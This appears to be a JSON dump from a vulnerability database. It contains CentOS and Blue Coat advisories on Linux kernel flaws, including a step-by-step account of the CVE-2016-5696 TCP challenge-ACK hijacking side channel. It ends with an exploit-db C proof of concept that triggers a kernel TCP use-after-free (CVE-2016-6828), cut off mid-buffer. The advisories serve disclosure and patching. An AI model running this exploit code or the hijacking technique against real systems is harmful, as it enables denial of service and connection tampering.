If multiple processes in the GFS2 module raced to do the same thing, one process sometimes overwrote a valid object pointer with an invalid pointer, which caused either a kernel panic or a file system corruption. This update ensures that the resource group object pointer is not overwritten. As a result, neither kernel panic nor file system corruption occur in the described scenario. (BZ#1347539)\n\n* Previously, the SCSI Remote Protocol over InfiniBand (IB-SRP) was disabled due to a bug in the srp_queue() function. As a consequence, an attempt to enable the Remote Direct Memory Access (RDMA) at boot caused the kernel to crash. With this update, srp_queue() has been fixed, and the system now boots as expected when RDMA is enabled. (BZ#1348062)\n\nEnhancement(s):\n\n* This update optimizes the efficiency of the Transmission Control Protocol (TCP) when the peer is using a window under 537 bytes in size. As a result, devices that use maximum segment size (MSS) of 536 bytes or fewer will experience improved network performance. 
(BZ#1354446)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-August/034091.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-firmware\nkernel-headers\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-1664.html", "edition": 3, "modified": "2016-08-23T20:59:58", "published": "2016-08-23T20:59:58", "href": "http://lists.centos.org/pipermail/centos-announce/2016-August/034091.html", "id": "CESA-2016:1664", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-12-20T18:25:41", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "**CentOS Errata and Security Advisory** CESA-2016:1633\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nIt was found that the RFC 5961 challenge ACK rate limiting as implemented \nin the Linux kernel's networking subsystem allowed an off-path attacker to \nleak certain information about a given connection by creating congestion on \nthe global challenge ACK rate limit counter and then measuring the changes \nby probing packets. An off-path attacker could use this flaw to either \nterminate TCP connection and/or inject payload into non-secured TCP \nconnection between two endpoints on the network. 
(CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao from Cyber Security Group in the CS department of University of California, Riverside, for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-August/034078.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-1633.html", "edition": 3, "modified": "2016-08-20T02:00:21", "published": "2016-08-20T02:00:21", "href": "http://lists.centos.org/pipermail/centos-announce/2016-August/034078.html", "id": "CESA-2016:1633", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "symantec": [{"lastseen": "2020-12-24T10:41:20", "bulletinFamily": "software", "cvelist": ["CVE-2016-5696"], "description": "### SUMMARY\n\nBlue Coat products that include a vulnerable version of an operating system that supports RFC 5961 are susceptible to a TCP session hijacking vulnerability. A remote, off-path attacker can infer the sequence numbers of an existing TCP connection, and either reset the connection or inject arbitrary data. \n \n\n\n### AFFECTED PRODUCTS\n\nThe following products are vulnerable:\n\n**Content Analysis System (CAS)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 2.1 and later | Not vulnerable, fixed in 2.1.1.1 \n1.3 | Upgrade to 1.3.7.3. \n \n \n\n**Mail Threat Defense (MTD)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 1.1 | Not available at this time \n \n \n\n**Malware Analysis Appliance (MAA)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 4.2 | Upgrade to 4.2.11. 
\n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 1.8 and later | Not vulnerable, fixed in 1.8.1.1 \n1.7 | Upgrade to 1.7.2.1. \n1.6 | Upgrade to later release with fixes. \n1.5 | Upgrade to later release with fixes. \n \n \n\n**Norman Shark Industrial Control System Protection (ICSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 5.4 and later | Not vulnerable, fixed in 5.4.1 \n5.3 | Upgrade to later release with fixes. \n \n \n\n**Norman Shark Network Protection (NNP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 5.3 | A fix will not be provided. \n \n \n\n**Norman Shark SCADA Protection (NSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 5.3 | A fix will not be provided. Customers who use NSP for USB cleaning can switch to a version of ICSP with fixes. \n \n \n\n**PacketShaper (PS) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 11.7 and later | Not vulnerable, fixed in 11.7.1.1 \n11.6 | Upgrade to 11.6.2.1. \n11.2, 11.3, 11.4, 11.5 | Upgrade to later release with fixes. \n \n \n\n**PolicyCenter (PC) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 1.1 | Upgrade to 1.1.3.1. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 10.2 and later | Not vulnerable, fixed in 10.2.1.1. \n10.1 | Upgrade to 10.1.5.1. \n9.5 | Not vulnerable \n9.4 | Not vulnerable \n \n \n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 7.3 and later | Not vulnerable, fixed in 7.3.1. \n7.2 | Upgrade to 7.2.2. 
\n7.1 | Not vulnerable \n6.6 | Not vulnerable \n \n \n\n**SSL Visibility (SSLV)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 3.11 and later | Not vulnerable, fixed in 3.11.1.1 \n3.10 | Not available at this time \n3.9 | Upgrade to 3.9.7.1. \n3.8.4FC | Upgrade to later release with fixes. \n \n \nThe following products have a vulnerable version of an operating system that supports RFC 5961, but are not vulnerable to known vectors of attack:\n\n**Advanced Secure Gateway (ASG)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-5696 | 6.7 and later | Not vulnerable, fixed in 6.7.2.1 \n6.6 | Upgrade to 6.6.5.4. \n \n \n\n### ADDITIONAL PRODUCT INFORMATION \n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nDirector \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nPacketShaper \nPolicyCenter \nProxyAV \nProxyAV ConLog and ConLogXP \nProxyClient \nProxySG \nX-Series XOS \nUnified Agent \nWeb Isolation**\n\nBlue Coat no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP. 
\n \n\n\n### ISSUES \n\n**CVE-2016-5696** \n--- \n**Severity / CVSSv2** | Medium / 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n**References** | SecurityFocus: [BID 91704](<https://www.securityfocus.com/bid/91704>) / NVD: [CVE-2016-5696](<https://nvd.nist.gov/vuln/detail/CVE-2016-5696>) \n**Impact** | Denial of service, unauthorized data modification \n**Description** | A side channel flaw in TCP packet handling allows a remote attacker to send spoofed packets and hijack a TCP connection. The attacker can reset the connection or inject arbitrary data. \n \nThis Security Advisory addresses TCP session hijacking vulnerabilities in operating systems that support _RFC 5961 - Improving TCP's Robustness to Blind In-Window Attacks_. RFC 5961 provides defenses against the following blind in-window attacks that affect the original TCP protocol specified in _RFC 793 - Transmission Control Protocol_:\n\n * Blind reset attack using TCP reset (RST) packets - a remote, off-path attacker can use spoofed RST packets to reset an existing TCP connection.\n * Blind reset attack using TCP synchronize (SYN) packets - a remote, off-path attacker can use spoofed SYN packets to reset an existing TCP connection.\n * Blind data injection attack - a remote, off-path attacker can use spoofed data packets to inject arbitrary data into an existing TCP connection.\n\nAccording to RFC 793, TCP hosts that receive one of the packets above only need to verify that the packet's sequence number is within the target's receive window. An attacker can successfully perform these attacks if they can guess sequence numbers within the target's receive window. RFC 5961 tightens the sequence number checks as follows:\n\n 1. If the packet's sequence number matches exactly the next expected sequence number, the target TCP host accepts the packet.\n 2. 
If the packet's sequence number does not match the next expected sequence number, but is within the target's receive window, the target TCP host responds with a challenge acknowledgement (ACK) packet. The challenge ACK packet forces the sender to resend the packet with the exact sequence number expected by the target. If the original packet is spoofed, the off-path attacker never receives the challenge ACK packet and the attack cannot proceed.\n\nRFC 5961 specifies a challenge ACK throttling mechanism to control the rate of outgoing challenge ACK packets and prevent them from consuming the target host's CPU and bandwidth resources. The throttling mechanism uses a global, system-wide counter to control the rate of challenge ACK packets among all existing network connections on the system. The counter is configurable, but uses a well-known default value _N_.\n\nSecurity researchers have discovered that the global challenge ACK counter exposes a side channel for inferring TCP sequence numbers and hijacking existing TCP connections:\n\n 1. The attacker sends a spoofed packet to the target. If the packet's sequence number is within the target's receive window, the target responds with a challenge ACK packet and decrements the global challenge ACK counter from _N_ to _N-1_.\n 2. The attacker establishes a direct TCP connection to the target and sends _N_ non-spoofed packets with in-window sequence numbers. If the attacker receives _N-1_ challenge ACK packets in response, the sequence number of the spoofed packet in step 1 was within the target's receive window. If the attacker receives _N_ challenge ACK packets, the spoofed packet's sequence number was not in the target's receive window.\n\nAfter guessing the TCP connection's sequence numbers, the attacker can reset the connection or inject arbitrary data. 
\n \n\n\n### REFERENCES \n\nOff-Path TCP Exploits: Global Rate Limit Considered Dangerous - <http://www.cs.ucr.edu/~zhiyunq/pub/sec16_TCP_pure_offpath.pdf> \nRFC 5961 - Improving TCP's Robustness to Blind In-Window Attacks - <https://tools.ietf.org/html/rfc5961> \nRFC 793 - Transmission Control Protocol - <https://tools.ietf.org/html/rfc793> \n \n\n\n### REVISION\n\n2020-04-23 A fix will not be provided in Industrial Control System Protection (ICSP) 5.3. Please upgrade to a later release with the vulnerability fixes. Advisory status changed to Closed. \n2019-10-02 Web Isolation is not vulnerable. \n2019-09-21 SA 8.0 is not vulnerable. ICSP 5.4 is not vulnerable because a fix is available in 5.4.1. \n2018-08-03 Customers who use NSP for USB cleaning can switch to a version of Industrial Control System Protection (ICSP) with fixes. \n2018-06-29 A fix for Norman Shark Network Protection (NNP) 5.3 and Norman Shark SCADA Protection (NSP) 5.3 will not be provided. \n2018-04-22 PacketShaper S-Series 11.10 is not vulnerable. \n2017-11-06 ASG 6.7 is not vulnerable because a fix is available in 6.7.2.1. \n2017-08-02 SSLV 4.1 is not vulnerable. \n2017-07-24 PacketShaper S-Series 11.9 is not vulnerable. \n2017-07-20 MC 1.10 is not vulnerable. \n2017-06-22 Security Analytics 7.3 is not vulnerable. \n2017-06-05 PacketShaper S-Series 11.8 is not vulnerable. \n2017-05-18 CAS 2.1 is not vulnerable. \n2017-03-30 MC 1.9 is not vulnerable. \n2017-03-29 A fix for ASG 6.6 is available in 6.6.5.4. \n2017-03-08 MC 1.8 is not vulnerable. ProxySG 6.7 is not vulnerable. SSLV 4.0 is not vulnerable. A fix for PolicyCenter S-Series is available in 1.1.3.1. Vulnerability inquiries for DLP should be addressed to Digital Guardian technical support. \n2017-01-25 A fix for Security Analytics 7.2 is available in 7.2.2. \n2017-01-24 A fix for CAS 1.3 is available in 1.3.7.3. \n2017-01-13 A fix in SSLV 3.9 is available in 3.9.7.1. \n2017-01-10 A fix for Reporter 10.1 is available in 10.1.5.1. 
\n2016-12-19 A fix for MAA is available in 4.2.11. \n2016-12-02 A fix is available in SSLV 3.11.1.1. \n2016-12-02 PacketShaper S-Series 11.7 is not vulnerable. \n2016-11-17 Cloud Data Protection for Oracle Field Service Cloud is not vulnerable. \n2016-11-14 MC 1.7 is vulnerable and a fix for MC 1.7 is available in 1.7.2.1. \n2016-11-11 SSLV 3.10 is vulnerable. A fix is not available at this time. \n2016-11-04 A fix for PacketShaper S-Series is available in 11.6.2.1. \n2016-09-14 initial public release \n2016-09-15 ASG has a vulnerable version of an operating system that supports RFC 5961, but is not vulnerable to known vectors of attack.\n", "modified": "2020-04-23T20:02:44", "published": "2016-09-14T08:00:00", "id": "SMNTC-1378", "href": "", "type": "symantec", "title": "SA131 : TCP Session Hijacking in Operating Systems Supporting RFC 5961", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-11-09T10:57:12", "description": "Linux Kernel - TCP Related Read Use-After-Free. CVE-2016-6828. 
Dos exploit for Linux platform", "published": "2016-08-18T00:00:00", "type": "exploitdb", "title": "Linux Kernel - TCP Related Read Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6828"], "modified": "2016-08-18T00:00:00", "id": "EDB-ID:40731", "href": "https://www.exploit-db.com/exploits/40731/", "sourceData": "// Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html\r\n\r\n// to build clang derp4.c -o derp4 -static\r\n\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <pthread.h>\r\n#include <stdio.h>\r\n\r\n#ifndef SYS_mmap\r\n#define SYS_mmap 9\r\n#endif\r\n#ifndef SYS_socket\r\n#define SYS_socket 41\r\n#endif\r\n#ifndef SYS_bind\r\n#define SYS_bind 49\r\n#endif\r\n#ifndef SYS_sendto\r\n#define SYS_sendto 44\r\n#endif\r\n#ifndef SYS_setsockopt\r\n#define SYS_setsockopt 54\r\n#endif\r\n#ifndef SYS_dup\r\n#define SYS_dup 32\r\n#endif\r\n#ifndef SYS_sendmsg\r\n#define SYS_sendmsg 46\r\n#endif\r\n#ifndef SYS_recvfrom\r\n#define SYS_recvfrom 45\r\n#endif\r\n#ifndef SYS_write\r\n#define SYS_write 1\r\n#endif\r\n\r\nlong r[62];\r\n\r\n\r\nint main(int argc, char **argv)\r\n{\r\n while (1) {\r\n pid_t pid = fork();\r\n\r\n if (pid == 0) {\r\n r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);\r\n r[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0);\r\n memcpy((void*)0x20006000, 
\"\\x0a\\x00\\xab\\x12\\xc7\\x17\\x1c\\x83\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x4f\\xdc\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\", 128);\r\n r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);\r\n r[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);\r\n memcpy((void*)0x20012f5a, \"\\x25\\xf9\\x1b\\xd4\\xeb\\xf5\\x39\\x3c\\xd5\\x80\\xf6\\xf0\\xd6\\xe1\\xff\\x65\\x30\\x97\\xac\\xaf\\x1b\\xbc\\xc8\\xae\\xa4\\x1e\\xab\\xd8\\x60\\x51\\xcb\\x4b\\xed\\xae\\xaa\\x37\\xda\\x80\\xf9\\x06\\xb8\\x6b\\xdf\\x78\\x0f\\xd0\\x87\\xf2\\x65\\x5f\\x5e\\x85\\xb5\\x4d\\x6b\\x48\\xff\\xf3\\x0d\\x46\\x1c\\xe5\\xa4\\x48\\x38\\x78\\x18\\x71\\x9b\\x75\\xc4\\xc9\\x77\\xf2\\xc4\\x5f\\x88\\x8e\\xd2\\x8d\\x97\\x26\\x56\\x4c\\x93\\x31\\xbc\\x64\\x22\\xff\\xdc\\x68\\x01\\x74\\x43\\xea\\x84\\x6f\\x1d\\x90\\xeb\\x98\\x6c\\xe9\\x1c\\x3b\\x72\\xab\\xa0\\xb5\\x5b\\xe8\\xee\\xfb\\xf3\\x2d\\x96\\xa0\\xd4\\x13\\x55\\xbc\\xd4\\xe0\\x41\\xfd\\x78\\x7e\\x90\\xf9\\x9f\\x9c\\x57\\x32\\x47\\xf2\\xcf\\x7f\\x4a\\x7b\\x79\\x0a\\xdd\\xb4\\xce\\xbd\\x0b\\x44\\x02\\x95\\x0f\\xaf\\x50\\xff\\x87\\x90\\x09\\xaa\\x94\\x01\\x41\\x43\\x08\\x8e\\xb1\", 165);\r\n memcpy((void*)0x20020000, \"\\x0a\\x00\\xab\\x12\\x0d\\xf5\\xba\\x69\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\xac\\xad\\xce\\xa0\", 28);\r\n r[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul);\r\n *(uint32_t*)0x20001fff = 
(uint32_t)0x2;\r\n r[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0);\r\n r[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);\r\n *(uint32_t*)0x20018000 = (uint32_t)0x4;\r\n r[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0);\r\n *(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000;\r\n *(uint32_t*)0x2000dfd0 = (uint32_t)0xc;\r\n *(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000;\r\n *(uint64_t*)0x2000dfe0 = (uint64_t)0x1;\r\n *(uint64_t*)0x2000dfe8 = (uint64_t)0x0;\r\n *(uint64_t*)0x2000dff0 = (uint64_t)0x0;\r\n *(uint32_t*)0x2000dff8 = (uint32_t)0x4;\r\n *(uint16_t*)0x2000e000 = (uint16_t)0x0;\r\n *(uint16_t*)0x2000e002 = (uint16_t)0x0;\r\n *(uint32_t*)0x2000e004 = (uint32_t)0xffff;\r\n *(uint32_t*)0x2000e008 = (uint32_t)0x401;\r\n *(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a;\r\n *(uint64_t*)0x20000008 = (uint64_t)0x37;\r\n *(uint32_t*)0x2000ed3a = (uint32_t)0x14;\r\n *(uint16_t*)0x2000ed3e = (uint16_t)0x2;\r\n *(uint16_t*)0x2000ed40 = (uint16_t)0x12;\r\n *(uint32_t*)0x2000ed42 = (uint32_t)0x1f;\r\n *(uint32_t*)0x2000ed46 = (uint32_t)0x7;\r\n *(uint8_t*)0x2000ed4a = (uint8_t)0x6;\r\n *(uint8_t*)0x2000ed4b = (uint8_t)0x100;\r\n *(uint8_t*)0x2000ed4c = (uint8_t)0x3f;\r\n *(uint32_t*)0x2000ed4d = (uint32_t)0x11;\r\n *(uint16_t*)0x2000ed51 = (uint16_t)0x0;\r\n *(uint16_t*)0x2000ed53 = (uint16_t)0x808;\r\n *(uint32_t*)0x2000ed55 = (uint32_t)0x1;\r\n *(uint32_t*)0x2000ed59 = (uint32_t)0x0;\r\n *(uint8_t*)0x2000ed5d = (uint8_t)0x0;\r\n *(uint32_t*)0x2000ed5e = (uint32_t)0x12;\r\n *(uint16_t*)0x2000ed62 = (uint16_t)0x2ea;\r\n *(uint16_t*)0x2000ed64 = (uint16_t)0x200;\r\n *(uint32_t*)0x2000ed66 = (uint32_t)0x5;\r\n *(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff;\r\n *(uint8_t*)0x2000ed6e = (uint8_t)0x9;\r\n *(uint8_t*)0x2000ed6f = (uint8_t)0x1;\r\n r[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0);\r\n *(uint16_t*)0x20001003 = (uint16_t)0x1;\r\n *(uint8_t*)0x20001005 = (uint8_t)0x0;\r\n *(uint32_t*)0x20001007 = 
(uint32_t)0x9;\r\n r[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul);\r\n memcpy((void*)0x20015285, \"\\xed\\xe0\\xf1\\x03\\xbd\\x1d\\xe2\\x8d\\x13\\x62\\xc9\\x11\\xde\\x3b\\x55\\xb1\\xb2\\x26\\x95\\xb2\\x3f\\x32\\x96\\x8a\\x3d\\xf7\\xd4\\x2c\\xd9\\x32\\xae\\x05\\x9a\\x60\\x09\\xbc\\x49\\x63\\x6a\\x45\\xd5\\x6f\\xa8\\x4b\\xaf\\x8a\\x66\\xf3\\x35\\xad\\xe6\\x68\\x85\\xd4\\x7e\\xe5\\x7c\\x7e\\x06\\xbf\\x32\\xfb\\xf9\\xd2\\x9f\\x40\\xa3\\x0a\\xa0\\x93\\x09\\x73\\x39\\x7d\\xac\\x3c\\x8d\\x83\\xe0\\x0c\\x5e\\xa2\\x36\\x9b\\x9c\\xb4\\x62\\xe8\\x39\\x07\\xd8\\x71\\xc1\\x2f\\x6f\\x18\\xfa\\x8a\\x5d\\x06\\xb4\\x46\\xa2\\x97\\x79\\x81\\xb2\\x85\\xd4\\x4f\\x6b\\x48\\xc4\\xf5\\xdd\\xa8\\x8d\\x10\\x74\\x01\\xe1\\x58\\xb2\\x82\\x72\\xc4\\xb6\\xb2\\xf7\\xaa\\x90\\x9c\\x9f\\x61\\x95\\x87\\x7b\\x99\\xc5\\xa5\\x53\\xbc\\xab\\xdb\\xdb\\x5e\\x32\\xb8\\xc3\\xee\\xd3\\xda\\x7a\\xf2\\x5c\\xc5\\x1a\\xf1\\xd6\\x1b\\x53\\xad\\x24\\xd0\\xa0\\xc0\\x0d\\x73\\x9e\\x81\\x7e\\x4e\\x82\\xf5\\xa9\\x73\\x3c\\x7a\\x5c\\x6e\\x4c\\x48\\x7d\\x42\\xf5\\x2f\\x68\\xf9\\x7e\\xa9\\xd8\\x6a\\x64\\x78\\x08\\x7a\\x37\\xe9\\xd3\\x81\\x15\\x34\\x63\\x63\\x14\\xb7\\x1a\\x43\\x9b\\x4f\\x85\\xfa\\x88\\x5c\\xe1\\x1e\\xce\\x87\\x95\\xe1\\x81\\xc8\\x06\\xaf\\x1a\\x64\\x26\\x36\\x83\\x36\\xef\\x71\\x0c\\x2a\\xda\\xe4\\xff\\xa1\\x87\\xc2\\x04\\x96\\x1c\\x72\\xd9\\x2d\\xf0\\xce\\x46\\xd4\\x3a\\xd1\\xc7\\x2f\\x60\\x25\\xf8\\x33\\x1f\\x38\\x7a\\x46\\xb1\\x43\\xa4\\xd2\\x65\\x77\\x47\\x85\\xe9\\xad\\x52\\xdb\\x8b\\x93\\x23\\xf1\\xf9\\xa9\\x5f\\xe4\\xf8\\x39\\x82\\xc5\\xb4\\xe1\\x5b\\x87\\xa0\\xfd\\x2c\\xc2\\x84\\x15\\x78\\xaa\\x9b\\x3f\\xe5\\x75\\x6e\\x05\\xef\\x84\\x4c\\x6b\\x9d\\x1d\\x9e\\x7c\\x92\\x3b\\x55\\xcb\\x01\\x6f\\xc5\\x9a\\xd8\\xc3\\x91\\x39\\x95\\xd7\\x8f\\xe9\\x87\\x15\\x27\\xe7\\x19\\xa8\\x18\\x24\\xfd\\x09\\x11\\x49\\x41\\xc6\\xd2\\xe9\\x1a\\xf4\\xb0\\x9b\\x85\\x9b\\x3f\\xb1\\xf3\\xc3\\x48\\xc5\\xe7\\x45\\x0b\\x21\\x2d\\x32\\x27\\x92\\x3c\\x39\\x52\\x0f\\x2b\\xdf\\x52\\x66\
\x6f\\x01\\x8f\\xdc\\xfa\\x8f\\x5e\\x53\\xb7\\x82\\x23\\x79\\xfa\\x28\\xe5\\x24\\xa7\\x5e\\x2a\\x24\\x7e\\xd0\\x1e\\xd5\\x1a\\xb6\\xb8\\xe5\\xb2\\x6d\\x4d\\x38\\x61\\x79\\xb8\\xd1\\x27\\x92\\x63\\x0c\\xed\\x3c\\xf1\\x13\\x98\\x37\\xfa\\x98\\xda\\x0c\\x1a\\x86\\xd1\\x6a\\x12\\x86\\x2f\\xd0\\x8d\\x8e\\x2e\\x52\\x23\\xac\\x2d\\x82\\x59\\xef\\x17\\xbc\\xf1\\x47\\xfb\\xf0\\x5f\\x43\\x70\\x99\\x14\\xdf\\xaf\\x44\\x02\\xb5\\xe9\\x39\\x51\\x8e\\xf2\\x07\\x9c\\xa2\\x39\\xab\\x07\\xa2\\x22\\xa7\\xd3\\x5c\\xc0\\x8c\\xcf\\x3c\\xa2\\xa7\\xd0\\xd6\\xf4\\x82\\xcc\\x35\\x75\\x3a\\x20\\xb7\\x9b\\xf3\\x9d\\xd9\\xfe\\xdf\\x1e\\x3f\\x55\\xf2\\x99\\xdb\\xd0\\xb2\\xd7\\x86\\xc1\\xfa\\xb3\\xc7\\x99\\xdc\\x02\\xe3\\x9f\\xfd\\x1e\\x56\\xc1\\xf2\\x51\\x32\\x84\\x61\\x30\\x33\\xf6\\xe3\\x82\\x9f\\xf2\\x04\\xaf\\x5d\\xf4\\x3d\\xa6\\x0e\\x25\\x53\\xe9\\x05\\x7c\\x42\\xbf\\xfa\\x97\\xd7\\x77\\x8c\\x8f\\x29\\x7a\\xcb\\x40\\x13\\x07\\xb5\\x8d\\x69\\xdc\\x8b\\x35\\xd3\\xb6\\xf3\\xd8\\x07\\x94\\x7e\\x69\\x0f\\xb7\\x28\\xf1\\xb3\\x45\\x60\\x37\\x65\\xa4\\xf6\\xbf\\x9c\\xb3\\xf9\\x3d\\xe1\\x08\\x08\\xc9\\x76\\x5e\\x8b\\x7f\\x26\\x01\\x9d\\x8f\\x15\\x39\\x02\\xfe\\x8a\\xe3\\x3b\\x8b\\xf9\\xae\\x06\\x04\\xef\\x0d\\xcf\\x67\\x24\\x54\\xe6\\x4c\\xe4\\x05\\x8e\\xd7\\xda\\x4c\\xf2\\xd7\\x88\\x75\\x87\\xf7\\x7e\\xd0\\x49\\x19\\x02\\x5e\\x00\\xc4\\xeb\\x3e\\xec\\x70\\x35\\x9c\\x9b\\xc9\\xd9\\x47\\x65\\x4c\\xa3\\xdb\\x0e\\xde\\x1e\\x76\\x58\\x27\\xe0\\x91\\x6b\\xf9\\x25\\x44\\xa6\\xa2\\x85\\x8f\\x50\\xd0\\x13\\x88\\x57\\x25\\x56\\x78\\xed\\xcb\\x6b\\xec\\xf2\\x4f\\xd4\\xce\\xf1\\x90\\xcd\\x49\\x50\\xb5\\xcf\\xd3\\x96\\x4d\\x3c\\xf4\\x54\\x8e\\xa9\\xdb\\xd3\\xb5\\x9e\\xe9\\x87\\x19\\x8b\\x59\\xd7\\xf2\\xcf\\x1a\\xd3\\x70\\xca\\x42\\xc6\\x97\\x66\\x38\\x24\\x39\\x4d\\x42\\xa1\\xf0\\x24\\x46\\xe4\\x0e\\x9c\\xbc\\xc4\\x53\\xa9\\xb9\\x94\\x4d\\xca\\x48\\xa6\\x04\\xb8\\x2f\\x4f\\xf5\\x85\\x32\\x22\\xf8\\x4e\\x83\\xab\\x34\\x27\\x3b\\x8f\\x24\\x48\\x15\\x9b\\xa9\\xf8\\xb9\\xb7\\xcb\\xd5\\xfb\\x72\\xec\\x7a\\xc3\\x39\
\x9c\\xde\\x25\\x76\\x08\\x3f\\x49\\x35\\xbd\\x42\\x4f\\x3f\\x5e\\xfc\\x6b\\x6b\\x9e\\x3e\\x34\\x47\\x62\\xed\\x5a\\xae\\xdc\\xcf\\x4e\\xe6\\x18\\xfa\\x7f\\xe6\\x46\\xc8\\xbe\\xbc\\x42\\x88\\xb6\\xfe\\xbd\\x96\\x85\\x5a\\x4a\\x1d\\xd2\\x00\\xe9\\x71\\x48\\x48\\x52\\xd6\\xf5\\x88\\x7d\\x94\\x18\\xf6\\xf0\\x5c\\x0a\\x39\\x29\\xc8\\x78\\xa0\\xa8\\x44\\xf4\\xb6\\xca\\x78\\x75\\x4a\\xf7\\x53\\xd7\\x7e\\x23\\xaf\\x6b\\xf9\\xcd\\x77\\xb2\\xd0\\x37\\x29\\x9c\\x57\\xbe\\x9e\\x5f\\x7c\\xe4\\x41\\x59\\xde\\xd5\\x63\\x02\\x2a\\xc0\\x74\\xa6\\x00\\xe2\\x8f\\x83\\x30\\xc1\\x60\\xcd\\xb3\\xca\\x44\\x1d\\x88\\x54\\x8b\\xbc\\xa8\\x79\\x78\\x86\\xa2\\x49\\x7c\\x94\\x49\\xf3\\xb4\\x41\\x44\\x76\\x33\\xf1\\x2e\\x71\\xbc\\xa1\\x39\\xb9\\x68\\x56\\xd9\\xa0\\xa1\\x6f\\xdc\\x7d\\xa3\\xb8\\x4f\\x1c\\xb8\\x19\\x26\\x42\\x88\\x0e\\xc